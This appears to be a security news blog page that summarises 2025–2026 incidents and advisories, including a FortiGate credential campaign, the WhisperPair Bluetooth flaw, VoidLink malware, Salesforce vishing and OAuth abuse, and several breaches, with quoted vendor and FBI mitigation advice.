Security blog - squirrelworks

Fortinet attacker leveraged AI to target 600+ devices

Monday February 23, 2026 | By SquirrelBot

Through routine threat intelligence operations, Amazon Threat Intelligence identified infrastructure hosting malicious tooling associated with this campaign. The threat actor had staged additional operational files on the same publicly accessible infrastructure, including AI-generated attack plans, victim configurations, and source code for custom tooling.

This inadequate operational security provided comprehensive visibility into the threat actor's methodologies and the specific ways they leverage AI throughout their operations.

The threat actor compromised globally dispersed FortiGate appliances, extracting full device configurations that yielded credentials, network topology information, and device configuration information. They then used these stolen credentials to connect to victim internal networks and conduct post-exploitation activities including Active Directory compromise, credential harvesting, and attempts to access backup infrastructure, consistent with pre-ransomware operations.¹

Following successful compromise, the hackers were seen leveraging open source offensive tools to extract NTLM password hashes, obtain complete domain credential databases, and move laterally through pass-the-hash/pass-the-ticket attacks.

The attackers were also seen targeting Veeam Backup & Replication servers, likely to extract additional credentials and destroy backups in preparation for ransomware attacks. ²

According to AWS's observations, FortiGate vulnerabilities were not exploited by the hacker. Instead, the campaign exploited exposed management ports and weak credentials with single-factor authentication.

Moreover, when the actor encountered more secure environments, they moved on to softer targets rather than persisting, meaning their capability probably lies in AI-augmented efficiency and scale, not deeper technical skills, according to AWS.

The targeting seemed opportunistic rather than sector-specific, attacking vulnerable appliances via mass scanning using AI tools, AWS noted.³

A Reddit user's take:

Do not expose your MGMT interfaces to internet" is a recurring advice.

What about limiting mgmt access to trusted IP hosts via a local-in-policy?

PLEASE NOTE: we are NOT talking about "Administrators" object settings here, as it's well known that using that so-called mitigation will cause the login page to be actually presented to the potential attacker - and, ANY exposed HTTP(S) protocol will sooner or later be breached by the CVE of the week.

We are talking about: I set ONE main trusted public IP address the mgmt interface should reply to by actually presenting a web page (and maybe a 2nd one acting as a backup)... that's two addresses out of 4 billions.

All other HTTP(S) request to GUI are just be silently dropped, with no reply whatsoever.

Is that safe enough?

Added: one could even expand this concept by blocking via local-in-policy, WAN-side, any other critical protocol, as an added safety measure - even if that protocol has never been activated in first place: SSH/TELNET, FTP, SNMP, etc.

WhisperPair vulnerability - 17 models of headphones and speakers need updates

Thursday, January 15, 2026 | By Michael Banks

Google Fast Pair enables fast pairing and account synchronization with Bluetooth accessories such as earbuds, headphones, and speakers, all with a single tap.

The Fast Pair specification states that the pairing procedure should only be performed if the accessory is in pairing mode, but models from numerous brands do not check the pairing status of the device.

These improper implementations of Fast Pair open the door to a series of attacks dubbed WhisperPair, which allow attackers to take control of vulnerable accessories, academic researchers at the Computer Security and Industrial Cryptography group of Belgium's KU Leuven University explain.

"WhisperPair enables attackers to forcibly pair a vulnerable Fast Pair accessory (e.g., wireless headphones or earbuds) with an attacker-controlled device (e.g., a laptop) without user consent," the researchers say.

The security defect allows attackers within a range of up to 14 meters (~46 feet) to start the pairing process and "finish the Fast Pair procedure by establishing a regular Bluetooth pairing", within seconds.

"This gives an attacker complete control over the accessory, allowing them to play audio at high volumes or record conversations using the microphone," the academics note.¹

Security researchers at Belgium's KU Leuven University Computer Security and Industrial Cryptography group are revealing a collection of vulnerabilities they found in 17 audio accessories that use Google's Fast Pair protocol and are sold by 10 different companies: Sony, Jabra, JBL, Marshall, Xiaomi, Nothing, OnePlus, Soundcore, Logitech, and Google itself. The hacking techniques the researchers demonstrated, which they're collectively calling WhisperPair, would allow anyone within Bluetooth range of those devices-close to 50 feet in their testing-to silently pair with audio peripherals and hijack them.²

The Google Fast Pair Service (GFPS) utilizes Bluetooth Low Energy (BLE) to discover nearby Bluetooth devices. Many big-name audio brands use Fast Pair in their flagship products, so the potential attack surface consists of hundreds of millions of devices. The weakness lies in the fact that Fast Pair skips checking whether a device is in pairing mode. As a result, a device controlled by an attacker, such as a laptop, can trigger Fast Pair even when the earbuds are sitting in a user's ear or pocket, then quickly complete a normal Bluetooth pairing and take full control.

What that control enables depends on the capabilities of the hijacked device. This can range from playing disturbing noises to recording audio via built-in microphones.

It gets worse if the attacker is the first to pair the accessory with an Android device. In that case, the attacker's Owner Account Key-designating their Google account as the legitimate owner's-to the accessory. If the Fast Pair accessory also supports Google's Find Hub network, which many people use to locate lost items, the attacker may then be able to track the accessory's location.

Google classified this vulnerability, tracked under CVE-2025-36911, as critical. However, the only real fix is a firmware or software update from the accessory manufacturer, so users need to check with their specific brand and install accessory updates, as updating the phone alone does not fix the issue.³

VoidLink - A newly identified cloud-native Linux malware framework

Tuesday, January 13, 2026 | By SquirrelBot

A new Linux malware framework linked to Chinese-affiliated actors has been discovered by security researchers at Check Point Research.

Key takeaways ¹

VoidLink is an advanced malware framework made up of custom loaders, implants, rootkits, and modular plugins designed to maintain long-term access to Linux systems. The framework includes multiple cloud-focused capabilities and modules, and is engineered to operate reliably in cloud and container environments over extended periods.
VoidLink's architecture is extremely flexible and highly modular, centered around a custom Plugin API that appears to be inspired by Cobalt Strike's Beacon Object Files (BOF) approach. This API is used in more than 30+ plug-in modules available by default.
VoidLink employs multiple Operational Security (OPSEC) mechanisms, including runtime code encryption, self-deletion upon tampering, and adaptive behavior based on the detected environment, alongside a range of user-mode and kernel-level rootkit capabilities.
The framework appears to be built and maintained by Chinese-affiliated developers (exact affiliation remains unclear) and is actively evolving. Its overall design and thorough documentation suggest it is intended for commercial purposes.
The developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages, including Go, Zig, C, and modern frameworks such as React. In addition, the attacker possesses in-depth knowledge of sophisticated operating system internals, enabling the development of advanced and complex solutions.
Once a machine is infected, VoidLink surveys the compromised system and can detect which cloud provider the infected machine is running under.

Dubbed VoidLink, the framework consists of custom loaders, implants, and rootkits, and was purpose-built for long-term access to Linux systems.²

The cloud-first implant was written in the Zig programming language and designed to identify major cloud environments, such as AWS, GCP, Azure, Alibaba, and Tencent, as well as Kubernetes pods and Docker containers, and adjust its behavior accordingly.

This highly modular framework, named VoidLink by its developers, includes over 30 plugins, cloud and container persistence capabilities and robust operational security (OPSEC) features.

While no evidence of real-world infections linked to VoidLink have been observed and it is not clear if the framework is intended to be sold as a legitimate penetration testing tool or a cybercriminal toolkit, its documentation suggests it is intended for commercial purposes. It appears to be built and maintained by Chinese-speaking developers and is actively evolving, Check Point researchers noted in a report published on January 13.

The VoidLink developers demonstrate a high level of technical expertise, with strong proficiency across multiple programming languages. With VoidLink, they offer a sophisticated, feature rich tool to move through cloud environments and container ecosystems with adaptive stealth.

The Check Point Research team discovered VoidLink in December 2025, after it identified a small cluster of previously unseen Linux malware samples that seemed to originate from a Chinese-speaking development environment:

"Many of the binaries included debug symbols and other development artifacts, suggesting we were looking at in-progress builds rather than a finished, widely deployed tool. The speed and variety of changes across the samples indicate a framework that is being iterated upon quickly to achieve broader, real-world use".

VoidLink can steal credentials for cloud, Git, and other source code version control systems, and Check Point believes it is likely targeted at software engineers, either for espionage or supply-chain attacks.³

Likely created in a Chinese-affiliated development environment, the framework is still work in progress, but already contains a broad feature set, along with a development API inspired by Cobalt Strike, and is rapidly evolving.

"It includes rootkit-style capabilities (LD_PRELOAD, LKM, and eBPF), an in-memory plugin system for extending functionality, and adaptive stealth that adjusts runtime evasion based on the security products it detects, favoring operational security over performance in monitored environments"

VoidLink is deployed using a two-stage loader. Upon initialization, it enumerates the system's security tools and hardening measures to calculate a risk score and an evasion strategy that its modules then use for increased stealth. The framework supports multiple command-and-control (C&C) communication channels, such as HTTP/HTTPS, ICMP, and DNS tunneling, as well as P2P/mesh-style communication between infected systems. The framework creates a profile of host behavior to adapt C&C communication intervals, has a stealth module containing rootkits targeting various kernel versions that are deployed based on the infected environment, and contains several anti-analysis mechanisms.

VoidLink's operators can control agents, implants, and plugins via a web-based dashboard localized for Chinese users.

The dashboard allows operators to deploy 37 VoidLink plugins for various post-exploitation activities, enabling them to perform reconnaissance, lateral movement, persistence, process injection, credential access, and evidence deletion.

A build interface allows threat actors to generate customized implants with specific capabilities and stealth parameters that can be changed at runtime.

Per Check Point: "The framework's intended use remains unclear, and as of this writing, no evidence of real-world infections has been observed. The way it is built suggests it may ultimately be positioned for commercial use, either as a product offering or as a framework developed for a customer"...

Palto Alto and Google Cloud announce deeper AI integration

Friday, December 19, 2025 | By Michael Banks

Palo Alto Networks is migrating "key internal workloads" into Google Cloud Platform (GCP) as part of a new multibillion-dollar agreement that will support a handful of new AI-powered features for the vendor's cybersecurity services.¹

The new features include the ability for users to use Google Cloud's Vertex AI and Agent Engine with Palo Alto Networks Prisma AI Runtime Security (AIRS) platform. This will allow for the securing of developer tools like the Agent Development Kit using Prisma AIRS and for users to protect live AI workloads and data on Google Cloud.

Palo Alto Networks, which offers a range of cybersecurity products, already has more than 75 joint integrations with Google Cloud and has completed $2 billion in sales through the Google Cloud Marketplace.²

As part of the new phase of the partnership, Palo Alto Networks customers will be able to protect live AI workloads and data on Google Cloud, maintain security policies, accelerate Google Cloud adoption, and simplify and unify their security solutions, the companies said.

While the announcement was framed as a "landmark agreement", specific financial details remain sparse. Both companies characterized the deal only as a "multibillion-dollar commitment", declining to provide a precise dollar amount or a specific timeframe for the contract's duration. This lack of transparency is common in large-scale cloud partnerships, though it leaves industry analysts to speculate on the exact scale of the hardware commitment versus the software integration costs.

The companies are integrating Palo Alto's Prisma AIRS (AI Security) platform directly into Google Cloud's developer ecosystem³, with the partnership also involving deeper integration of core security infrastructure:

Software Firewalls: Palo Alto's VM-Series firewalls will be optimized for Google Cloud to provide deep packet inspection across public and hybrid environments.
Global SASE Connectivity: Palo Alto Networks' Prisma Access will leverage Google's global network and Cloud Interconnect, allowing remote workers to access AI applications with reduced latency and consistent security policies.
Operational Streamlining: The companies have committed to engineering pre-vetted solutions to reduce the "operational friction" often associated with deploying third-party security in cloud environments.

Chrome 143 patches UAF issue

Tuesday, December 2, 2025 | By Michael Banks

The latest patch^[1] for Google Chrome addresses several flaws of varying risk levels^[2], including a high-risk vulnerability called UAF. The Use-After-Free issue can occur in dynamic memory allocation processes where a pointer is not reset leading to a 'dangling' state which can be maniupulated by attackers.^[3]

Windows kernel zero-day patched

Wednesday, November 12, 2025 | By Michael Banks

Tracked as CVE-2025-62215

According to an advisory from Microsoft's Threat Intelligence Center and Security Response Center, successful exploitation requires an attacker to win a race condition (Concurrent Execution using Shared Resource with Improper Synchronization) in Windows kernel^[2], which would result in privilige escalation (SYSTEM) on the targeted system. ^[3]

The fix was released among other updates for Nov. 2025 patch Tuesday. Helpnet Security describes it as a memory corruption issue. Trend micro's Dustin Childs notes that "Bugs like these are often paired with a code execution bug by malware to completely take over a system"^[4]

F5 Hack - a highly sophisticated nation-state threat actor maintained long-term, persistent access

Thursday, October 16, 2025 | By SquirrelBot

According to a Security Advisory released by F5 on Oct 15th, an attack occured two months prior, in August. The affected systems, based on their evaluation of logs, are known to include:

Production development environment:
Engineering knowledge management platform

Stolen data includes Big-IP source code, as well as details on undisclosed vulnerabilities; but it's pointed out that there's no known active exploitation of any of those vulnerabilities.

Further, it's believed that exfiltration did not occur on their CRM, financial, support, or iHealth systems, nor is there any indication that these products were affected:

Product development enivronment
NGINX source code - web server and platform for app delivery using Kubernetes - Application delivery management software to optimize, scale, and secure modern apps, Kubernetes clusters, API communications, and AI inference across diverse environments.
F5 Distributed Cloud Services - SaaS-based security, networking, and app management
Silverline systems - Web Application Firewall

F5 states that they'll reach out to notify affected customers.

Microsoft: Russia, China Increasingly Using AI to Escalate Cyberattacks on the US

Thursday October 16, 2025 | By Michael Banks

Russia, China, Iran and North Korea have sharply increased their use of artificial intelligence to deceive people online and mount cyberattacks against the United States, according to new research from Microsoft.¹

This July, the company identified more than 200 instances of foreign adversaries using AI to create fake content online, more than double the number from July 2024 and more than ten times the number seen in 2023. ²

Over the last year, Microsoft observed nation-state actors conduct operations for financial gain, enlist cybercriminals to collect intelligence, particularly on the Ukrainian military, and make use of the same infostealers, command and control frameworks, and other tools favored by the cybercriminal community.³ Specifically:

Russian threat actors appear to have outsourced some of their cyberespionage operations to criminal groups, especially operations targeting Ukraine. In June 2024, a suspected cybercrime group used commodity malware to compromise at least 50 Ukrainian military devices.
Iranian nation-state actors used ransomware in a cyber-enabled influence operation, marketing stolen Israeli dating website data. They offered to remove specific individual profiles from their data repository for a fee.
North Korea is getting into the ransomware game. A newly-identified North Korean actor developed a custom ransomware variant called FakePenny, which it deployed at organizations in aerospace and defense after exfiltrating data from the impacted networks�demonstrating both intelligence gathering and monetization motivations.

Increasingly, these attackers are using AI to target governments, businesses and critical systems like hospitals and transportation networks, according to Amy Hogan-Burney, Microsoft's vice president for customer security and trust, who oversaw the report.⁴

Red Hat services compromised as 28,000 repos exposed

Monday, October 6, 2025 | By Michael Banks

Initially it was believed that the GitHUB instance had been attacked, until Red Hat confirmed it was the GitLAB instance used by their Consulting team.

The Hacker group is being called Crimson Collective.

The stolen data includes 570GB of 28,000 repository's data including credentials, secrets, and source code.

"At this time, we have no reason to believe the security issue impacts any of our other Red Hat services or products and are highly confident in the integrity of our software supply chain" Red Hat told SecurityWeek in an emailed statement/.

Upon detection, we promptly launched a thorough investigation, removed the unauthorized party's access, isolated the instance, and contacted the appropriate authorities

"Our investigation, which is ongoing, found that an unauthorized third party had accessed and copied some data from this instance."

On X/Twitter, International Cyber Digest reports that the attackers tried extorting Red Hat, but failed:

Salesforce security advisory on recent data theft attacks

Thursday, Oct 2, 2025 | By Michael Banks

In a Salesforce.com notice, it's asserted that the extortion attempts are based on 'past or unsubtantiated events' and that their systems are not technically compromised.

Recapping the attack
Per FBI Flash 20250912-001
ic3.gov/CSA/2025/250912.pdf

Threat actors used vishing tactics against staff across various orgs to gain access to Salesforce instances within those orgs.

UNC6040 threat actors commonly call victims� call centers posing as IT support employees addressing enterprise-wide connectivity issues. Under the guise of closing an auto-generated ticket, UNC6040 actors trick customer support employees into taking actions that grant the attackers access or lead to the sharing of employee credentials, allowing them access to targeted companies� Salesforce instances to exfiltrate customer data.

UNC6040 threat actors have utilized phishing panels, directing victims to visit from their mobile phones or work computers during the social engineering calls. After obtaining access, UNC6040 threat actors have then used API queries to exfiltrate large volumes of data in bulk.

UNC6040 threat actors have also directly requested user credentials and multifactor authentication codes to authenticate and add the Salesforce Data Loader application, facilitating data exfiltration.

Salesforce allows organizations to integrate with third-party applications, often called connected apps, using OAuth tokens for authentication after approved by an administrator or sufficiently privileged user. UNC6040 threat actors have deceived victims into authorizing malicious connected apps to their organization's Salesforce portal. This application is often a modified version of Salesforce�s Data Loader. During a vishing call, the actor guides the victim to visit Salesforce's connected app setup page, i.e.,

https://login.salesforce[.]com/setup/connect, to approve the UNC6040 malicious app. This grants UNC6040 threat actors significant capabilities to access, query, and exfiltrate sensitive information directly from the compromised Salesforce customer environments. Authorizing a malicious connected app bypasses many traditional defenses such as MFA, password resets and login monitoring, and because OAuth tokens are issued by Salesforce itself, activity coming from the malicious app can look like it�s from a trusted integration.

UNC6040 threat actors have created malicious applications within Salesforce trial accounts, allowing the threat actors the ability to register the connected apps without using a legitimate corporate account, making detection difficult.

Some UNC6040 victims have subsequently received extortion emails allegedly from the ShinyHunters group, demanding payment in cryptocurrency to avoid publication of exfiltrated data. These extortion demands have varied in time following UNC6040 threat actors� access and data exfiltration, ranging from a period of days to months

In Flash 20250912-001 the FBI recommends network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by cyber criminals:

Train call center employees to recognize and report phishing attempts
Require phishing-resistant multi-factor authentication (MFA) for as many services as possible
Implement authentication, authorization, and accounting (AAA) systems to limit actions users can perform. Apply the Principle of Least Privilege to user accounts and groups, allowing only the performance of authorized actions.
Enforce IP-based access restrictions and monitor and detect API usage, looking for unusual or malicious behavior.

How did it happen. A reddit user explains:

.....you just need a user to accept oauth consent for an illegitimate app. By default, Salesforce allows this as long as the user has API access. The individual app can be blocked and oauth revoked by an admin later, but the first "install" is allowed by default

The attackers are trying to extort Salesforce, the platform vendor, as well as the customer who use it. They claim to have stolen 1 billion recrods from brands including Addas, Air France/KLM, Allianz Life, Cisco, Dior, Disney, FedEx, Google, Home Depot, Kering, Louis Vuitton, Qantas, Stellantis, Toyota, TransUnion, UPS and Workday, among others.

Who is behind this?

Per Security Week:

Lapsus$ has been inactive since 2022, when Scattered Spider emerged. ShinyHunters first appeared in 2020 and joined forces with Scattered Spider earlier this year. They jointly announced their retirement last month.

What should be done? From reddit users

Primary focus should be on Connected App use, blocking those not needed, and securing those you do using white listing and least privileged access models. Majority of Salesforce related security issues are human error (phishing, incorrect config) and mitigated with proper security by design practices

Volvo North America part of the Miljodata ransomware breach

Wednesday, October1, 2025 | By SquirrelBot

Attackers targeted Miljodata, a Swedish IT Systems provider contracted by the Swedish governement to run IT Systems for most of Sweden's municipalities. The ransomware attack occured August 20-23rd resulting in leaked personal data of around one million Swedish citizens, including 870k email addresses, names and phone numbers. A spike in phishing attacks is expected, as it is confirmed that the leaked data was published to the dark net. The users affected are current or former employees of Swedish municipalities.

The attackers who are called "Datacarry", demanded 1.5 bitcoin prior to releasing the data.

Lund University, who uses the Adato software which was the point of attack, informed it's employees on Sep 29 that their data was affected. Milj�data supplies the Adato system to Lund University. Adato is a system used primarily to document and manage rehabilitation cases. It's used by HR teams to manage workers' sick leave.

A subset of the stolen data belonged to Volvo, who contracts Miljodata for their IT systems. The breach is now understood to have included Names and SSNs for Volvo's staff.

According Massacussetts Attorney General's office, the ransomware attack occured August 20 without the company realizing it until three days later. It's widely assumed that a bad link in an email led to the breach; details aren't known. The cyber attack is being investigated by police and IT security company TrueSec Consulting.

Python developers targeted in new phishing campaign

Wednesday, September 24, 2025 | By Michael Banks

PyPI, the official third-party repository for Python, hosts over 500,000 Python packages and functions as a searchable index. It's being targeted by attackers via phising attacks. These attacks employ domain-confusion tactics.

Phising emails are directing victims to the bogus domain 'pypi-mirror.org', where they are compelled to enter credentials to verify their accounts or face suspension.

This is extremely dangerous since a threat actor could upload malicious code into existing python packages.

A recent (July 2025) similar attack targeted users via typosquatting at the bogus address 'pypj.org'. The legit, official site is pypi.org.

Stripe, Inc. card skimming attack leverages payment iFrames

Sunday, September 21, 2025 | By SquirrelBot

Web skimmer campaign leveraging a deprecated API from Stripe, Inc. to validate stolen payment information, ensuring that only valid card data is exfiltrated. At least 50 merchants affected

Discovered by Source Defense in Feb 2025

The deprecated API is "api.stripe[dot]com/v1/sources" - It allows apps to accept various payment methods.. As of May 2024, the endpoint was deprecated in favor of the newer PaymentMethodsAPI.

A JavaScript skimmer is used to intercept and hide the legitamate payment form, then serve a replica of the checkout screent, validate the card using API, then phone home in base64-encoded format.

Cybersec firm Jscrambler indicates the attacks leverage vulnerablities and/or misconfigurations in WooCommerce, WordPress, and PrestaShop to implant the initial script.

"The skimming script hides the legitimate Stripe iframe and overlays it with a malicious one designed to mimic its appearance," the researchers said. "It also clones the 'Place Order' button, hiding the real one."

Chrome: Type Confusion issue patched

Thursday, September 18, 2025 | By SquirrelBot

Google's TAG (Threat Anaylysis Group) recently discovered a flaw, CVE-2025-10585, advising all users to update their Chrome browser to versions 140.0.7339.185/.186 for Windows and Apple macOS, and 140.0.7339.185 for Linux.

The zero-day vulnerability in question is CVE-2025-10585, which has been described as a type confusion issue in the V8 JavaScript and WebAssembly engine.

Type confusion vulnerabilities can have severe consequences as they can be weaponized by bad actors to trigger unexpected software behavior, resulting in the execution of arbitrary code and program crashes.

RacoonO365 PHAAS attack mitigated

Wednesday, September 17, 2025 | By Squirrelbot

Microsoft and CloudFlare seized 338 domains behind a phishing-as-a-service toolkit that succeeded in stealing over 5,000 users's o365 creds, from 94 countries, since last year.

"Using a court order granted by the Southern District of New York, the DCU seized 338 websites associated with the popular service, disrupting the operation's technical infrastructure and cutting off criminals' access to victims," Steven Masada, assistant general counsel at Microsoft's Digital Crimes Unit, said.

Cloudflare banned all identified domains and terminated associated Cloudflare Worker scripts which are understood to protect the phising pages, making them accessible to intended targets.

These phishing campaigns have targeted over 2,300 organizations in the U.S., including 20 healthcare entities.

RaccoonO365 PHAAS is marketed to other cybercriminals as a subscription service, allowing them to mount phishing and credential harvesting attacks at scale with little to no technical expertise. A 30-day plan costs $355, and a 90-day plan is priced at $999. Microsoft warns that at least 200 subscriptions have likley been sold.

"Using RaccoonO365's services, customers can input up to 9,000 target email addresses per day and employ sophisticated techniques to circumvent multi-factor authentication protections to steal user credentials and gain persistent access to victims' systems," Microsoft said. "Most recently, the group started advertising a new AI-powered service, RaccoonO365 AI-MailCheck, designed to scale operations and increase the sophistication � and effectiveness � of attacks."

Screencap of advertisement from their 850+ member telegram channel that discusses tactics in response to the recent disruption:

Salesforce Breach: "ShinyHunters" trick staff with phone scam

Monday, August 7, 2025 | By SquirrelBot

Hackers gained access to Salesforce database instances at Google, which serve small and medium-sized business. The offending group is known to use phishing techniques. They posed as IT support staff by phone, convincing victims to connect to a bogus version of the "Data Loader" app, which requires a 2fa code.

�Analysis revealed that data was retrieved by the threat actor during a small window of time before the access was cut off,� Google said. �The data retrieved by the threat actor was confined to basic and largely publicly available business information, such as business names and contact details.�

"Shinyhunters" has also been linked to similar attacks on Salesforce systems at Qantas, Adidas, and Louis Vuitton.

Orange telecom hacks: Business and consumer services disrupted in France

Monday, July 28, 2025 | By SquirrelBot

Orange (formerly France Telecom) posted a statement indicating that an attack was detected and stopped on July 25th, and that no customer data was exfiltrated, but that no other details would be released about what happened.¹

This follows an incident earlier this year where Orange's BGP network configs were attacked when a hacker gained access to an Orange account with RIPE - the European IP registry - and changed the configs.²

The RIPE admin account was breached when an Orang employee laptop was infected with Racoon info stealer malware several months prior.³

The service were restored after the attacker contacted Orange and returned access to them, stating that it was meant to protect from an actual bad actor...

RIPE stated they are investigating, and urged admins to enable MFA on their accounts.

securityweek.com/ripe-account-hacking-leads-to-major-internet-outage-at-orange-spain/

Quantas Airline attack - six million accounts compromised

Wednesday, July 2, 2025 | By Michael Banks

Attackers impersonated IT workers to gain access to Salesforce data at a Quantas call center. The compromised database contained 6 million records.

In a press releas, Quantas stated:

Specific data fields vary from customer to customer. Our analysis has found that the majority of customer records that were compromised are limited to:
Name, and/or
Email address, and/or
Qantas Frequent Flyer number (and in some cases, tier, status credits and points balance).

The airline said the platform stored names, email addresses, phone numbers, birth dates and frequent flyer numbers for six million customers. Qantas did not use the system to store credit card details, personal financial information, or passport details. Qantas has not identified the exact platform attacked in this incident. The airline is a known user of Salesforce and Genesys, vendors whose wares are often deployed in call centres

---end data------